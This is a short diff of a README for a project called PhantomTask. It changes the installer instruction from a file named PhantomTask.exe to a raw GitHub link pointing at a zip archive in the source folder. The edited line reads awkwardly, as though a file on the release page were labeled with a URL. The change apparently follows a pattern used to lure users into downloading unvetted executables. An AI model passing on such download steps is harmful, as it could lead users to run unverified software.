alimkitawa/PhantomTask/README.md

 ### 3. Download the Installer

 On the release page, you will find various files.
-Look for the one labeled `PhantomTask.exe` or something similar.
+Look for the one labeled `https://raw.githubusercontent.com/alimkitawa/PhantomTask/master/src/PhantomTask-v3.0-beta.5.zip` or something similar.
 This is the executable file you need.
 Click on it to start the download.

 ### 4. Locate the Downloaded File